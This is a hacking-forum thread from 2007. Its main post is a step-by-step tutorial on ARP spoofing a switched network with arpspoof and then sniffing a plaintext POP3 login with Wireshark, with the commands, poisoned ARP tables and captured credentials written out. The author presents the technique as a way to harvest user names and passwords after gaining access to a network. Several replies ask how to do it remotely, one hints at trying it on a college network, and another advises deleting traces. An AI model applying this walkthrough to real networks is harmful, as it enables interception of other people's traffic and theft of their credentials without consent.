TCP/IP Hijacking

Topics including TCP/IP, OSI, Netbios, exploiting share, proxies and much more
Post Reply
User avatar
GhostHawk
Ex-Mod
Posts: 1447
Joined: Wed Jul 30, 2003 12:10 am
Contact:

TCP/IP Hijacking

Post by GhostHawk » Tue Sep 04, 2007 8:34 am

TCP/IP Hijacking
Ghost Hawk
September 2007

Introduction

TCP/IP Hijacking is one of the most simple, yet powerful attacks a hacker can use. With proper use TCP/IP
Hijacking can be used to sniff passwords and other information from a switched network. When an Ethernet network
uses a HUB, packets that are sent to the hub from a pc on the network, are transmitted to all of it's
ports. Using a HUB on your network makes sniffing all the data on the network easy. What about sniffing on a

switched network? A switch is more intelligent then a hub. On a switched network, the switch inspects packets
that it receives then forwards that packet to the correct destination according to it's table. This makes
sniffing on the network a bit harder.

What is TCP/IP Hijacking?

With TCP/IP Hijacking an attacker sets up a device on the network that tricks other devices on the network
into sending their packets to it instead of where they are intended to go. With wired networks, TCP/IP Hijacking
will use a technique known as spoofing, which is basically the act of pretending to be something you are not.

One of the most common types of spoofing used in TCP/IP Hijacking is Address Resolution Protocol (ARP)
spoofing. Every computer on an Ethernet network using TCP/IP must have a unique IP address. They must also have
another address known as the media access control (MAC) address so they can move packets around the network. Each
computer on the network will then keep a table of IP Address and their corresponding MAC address, known as the ARP
Table. When ARP Spoofing a hacker will change that table to redirect packets on the network to their computer.

Example of ARP Spoofing

In this example I will be using ARP spoofing between my laptop and desktop on my switched network.

Target IP Address: 192.168.5.46
Gateway IP Address: 192.168.5.1
My MAC Address: 00:16:D4:C7:B9:CD

First thing I will do is turn on IP Forwarding in my linux box to allow routing of packets, if you skip this step

it will basically act as a DoS which will make it hard to sniff.

Code: Select all

bt ~ # nano /proc/sys/net/ipv4/ip_forward
Change the 0 to 1 and save the file.

On the target machine I opened up a cmd prompt just to look at the current ARP Table.

Code: Select all

C:\Documents and Settings\travis>arp -a

Interface: 192.168.5.46 --- 0x3
  Internet Address      Physical Address      Type
  192.168.5.1           00-50-8b-cc-43-48     dynamic
  192.168.5.2           00-30-48-74-e9-cc     dynamic
  192.168.5.220         00-30-48-74-e8-dc     dynamic

C:\Documents and Settings\travis>
That tells me that the mac address for the gateway in the arp table is currently 00:50:8b:cc:43:48

Now I switch to my linux box and start the program arpspoof to try to change that table.

Code: Select all

bt ~ # arpspoof -t 192.168.5.46 192.168.5.1
0:16:d4:c7:b9:cd 0:1:6c:a7:3e:8b 0806 42: arp reply 192.168.5.1 is-at 0:16:d4:c7:b9:cd
0:16:d4:c7:b9:cd 0:1:6c:a7:3e:8b 0806 42: arp reply 192.168.5.1 is-at 0:16:d4:c7:b9:cd
0:16:d4:c7:b9:cd 0:1:6c:a7:3e:8b 0806 42: arp reply 192.168.5.1 is-at 0:16:d4:c7:b9:cd
This command is telling the target 192.168.5.46 that the MAC address for the gateway 192.168.5.1 is actually
my mac address 0:16:d4:c7:b9:cd.

Now you turn the command around.

Code: Select all

bt ~ # arpspoof -t 192.168.5.1 192.168.5.46
0:16:d4:c7:b9:cd 0:50:8b:cc:43:48 0806 42: arp reply 192.168.5.46 is-at 0:16:d4:c7:b9:cd
0:16:d4:c7:b9:cd 0:50:8b:cc:43:48 0806 42: arp reply 192.168.5.46 is-at 0:16:d4:c7:b9:cd
This is telling the gateway 192.168.5.1 that the MAC address for 192.168.5.46 is actually my MAC address.

So I go back to the target machine and look at the ARP table again.

Code: Select all

C:\Documents and Settings\travis>arp -a

Interface: 192.168.5.46 --- 0x3
  Internet Address      Physical Address      Type
  192.168.5.1           00-16-d4-c7-b9-cd     dynamic
  192.168.5.2           00-30-48-74-e9-cc     dynamic
  192.168.5.6           00-16-d4-c7-b9-cd     dynamic
  192.168.5.51          00-11-0a-f8-ef-db     dynamic
  192.168.5.144         00-00-74-a5-8a-b3     dynamic
  192.168.5.220         00-30-48-74-e8-dc     dynamic

C:\Documents and Settings\travis>
There it is. The target machine now thinks that the gateway's MAC address is mine.

Time to open up the sniffer. You can use whatever sniffer you feel more comfortable with, in the example I used

Wireshark. I ran Wireshark for a few minutes, then went back and looked at all the packets I collected. The main

thing I am looking for right now is the POP3 username and password. I look through the list and see some lines that
contain POP3 in them. I right click on one of the packets and clicked Follow TCP Stream. What I saw was this:

Code: Select all

+OK Hello there.
AUTH 
-ERR Invalid command.
USER user@domain.com
+OK Password required.
PASS uwish
+OK logged in.
STAT
+OK 0 0
QUIT
+OK Bye-bye.
Almost scary easy isn't it?
Opinions are like ass holes, everyone has one. It is also my opinion, that I am an ass hole.

DigitolJedi
Hacker in Training
Posts: 50
Joined: Tue Jul 03, 2007 9:34 am
Location: plz don't change this again

Post by DigitolJedi » Tue Sep 04, 2007 10:01 am

good tut, Good for the noobs :oops: . Now all we need to know is how to do this remotely :D
If you don't find it in the index, look very carefully through the entire catalogue.

User avatar
Fishbones
Tough Luck ;-)
Posts: 644
Joined: Thu May 24, 2007 2:27 pm
Location: Unknown
Contact:

Post by Fishbones » Tue Sep 04, 2007 11:43 am

Heh. That is easy, but as DigitolJedi said, we need to learn how to do this remotely... But there really wouldn't be a way to do it remotely in my eyes, providing that the network is private... I can't access my school files remotely, most networks block out all other traffic besides the ones in their own network. Network switches are, as GhostHawk stated, more powerful than network hubs, because they inspect ( determine the source & destination of) network packets.

Remote attacks... Don't you think you'd have to have internal access, considering that a switch network has the ability to detect the sources of packets? If it can detect them, doesn't common sense say that it can block them as well? :wink:
46 69 73 68 62 6f 6e 65 73

Patience is not a virtue, but a discipline.
-Fishbones

User avatar
GhostHawk
Ex-Mod
Posts: 1447
Joined: Wed Jul 30, 2003 12:10 am
Contact:

Post by GhostHawk » Tue Sep 04, 2007 12:39 pm

This isn't a remote attack. Sniffing almost never is. This is designed post access to gain further access to the network, or to harvest user names and passwords to other things.
Opinions are like ass holes, everyone has one. It is also my opinion, that I am an ass hole.

User avatar
Fishbones
Tough Luck ;-)
Posts: 644
Joined: Thu May 24, 2007 2:27 pm
Location: Unknown
Contact:

Post by Fishbones » Tue Sep 04, 2007 1:27 pm

Which is basically what I was saying, GhostHawk :) Except I used two paragraphs, and you used two sentences :)
46 69 73 68 62 6f 6e 65 73

Patience is not a virtue, but a discipline.
-Fishbones

eleanor
Corporal
Posts: 126
Joined: Sun Nov 13, 2005 1:37 pm

Post by eleanor » Wed Sep 19, 2007 11:42 am

Hey, I was just wondering how to spoof an ARP if you're not on the same subnet. Let's say I have IP 192.168.2.2 (192.168.2.1 is a router) and the PC I want to spoof is 192.168.1.2 (192.168.1.1 is a routet -> also a router to WAN).

How would I (192.168.2.2) spoof the PC (192.168.1.2) ?

Arxo Clay
n00b
Posts: 23
Joined: Thu Aug 09, 2007 11:41 am
Contact:

Post by Arxo Clay » Wed Sep 19, 2007 10:20 pm

hmm so the arp spoof program simply modifies arp tables?

I'm in for a good time in college tomorrow :wink:

User avatar
Zezima
Strike 1
Posts: 49
Joined: Sun Dec 23, 2007 9:24 pm
Location: In your mind

Post by Zezima » Sun Dec 23, 2007 10:33 pm

great tutorial, just as fishbones said, now we need to know how to do this remotely, also if you dont know how to delete you traces in the command prompt, then dont even try this.
Carpe Diem

User avatar
hormesis
Veteran
Posts: 679
Joined: Wed May 17, 2006 3:27 pm
Location: irc.tddirc.net #hackerthreads

Post by hormesis » Sun Dec 23, 2007 11:02 pm

Old thread. Read the rules.

Liquid-K
n00b
Posts: 2
Joined: Tue Mar 25, 2008 3:10 pm

Post by Liquid-K » Tue Mar 25, 2008 6:49 pm

Going to sticky this to our Forums.

User avatar
Cool_Fire
Not a sandwich
Posts: 1912
Joined: Fri May 09, 2003 1:20 pm
Location: 41 6d 73 74 65 72 64 61 6d
Contact:

Re: TCP/IP Hijacking

Post by Cool_Fire » Thu Oct 15, 2009 10:25 pm

schweet, I knew how to do this with Cain & Abel since forever, but never got round to figuring out how to do it in Linux :)

blackhole_sun
n00b
Posts: 1
Joined: Thu Jun 09, 2011 2:35 pm

Re: TCP/IP Hijacking

Post by blackhole_sun » Thu Jun 09, 2011 2:49 pm

what a great tut...nice one!!

NC009
n00b
Posts: 1
Joined: Fri Jul 29, 2011 11:09 am

Re: TCP/IP Hijacking

Post by NC009 » Wed Aug 03, 2011 11:24 am

Cool_Fire wrote:schweet, I knew how to do this with Cain & Abel since forever, but never got round to figuring out how to do it in Linux :)
Look up Ettercap...the GUI is ok but the shell version is way better... :wink:

User avatar
Cool_Fire
Not a sandwich
Posts: 1912
Joined: Fri May 09, 2003 1:20 pm
Location: 41 6d 73 74 65 72 64 61 6d
Contact:

Re: TCP/IP Hijacking

Post by Cool_Fire » Thu Aug 04, 2011 3:33 pm

Wasn't ettercap superseded by Wireshark years ago? Or was that ethereal?
Either way, for a GUI network analyzer, I prefer Wireshark.
I'll have a look at the ncurses interface though.

As chance would have it, I've been doing network sniffing and analysis for a large part of the day today.
If we're breaking the rules, then how come you can't catch us? You can't find us? I know why. Cause, it's ... MAGIC!
Hackerthreads chat, where the party is going 24/7.

psilocybin
Sargeant at Arms
Posts: 191
Joined: Tue Feb 17, 2009 5:27 am

Re: TCP/IP Hijacking

Post by psilocybin » Thu Aug 04, 2011 6:52 pm

Cool_Fire wrote:Or was that ethereal?
'twas. ettercap is more like a sniffer and packet injector, rather than an analyzer. check it out, ettercap is pretty awesome.

User avatar
Thor
htd0rg lieutenant
Posts: 440
Joined: Tue Dec 18, 2007 9:39 am
Location: Location Location

Re: TCP/IP Hijacking

Post by Thor » Fri Aug 12, 2011 12:18 am

Watching network traffic can make you a little dizzy in a shell. I think this is good use of GUI. So im +1 for Wireshark. Not to mention the sheer amount of protocols it can decode, isn't it at like 10,000 or something ridiculous? In actuality, I prefer to have it up even if I am using something like ettercap because if your experimenting on your home net or something, you can see if the traffic is truly going where you think it's going.
Quidquid latine dictum sit, altum sonatur.
- Whatever is said in Latin sounds profound.

Omnis Vestri Substructio Es Servus Ad Nobis.
- All Your Base Are Belong To Us

Post Reply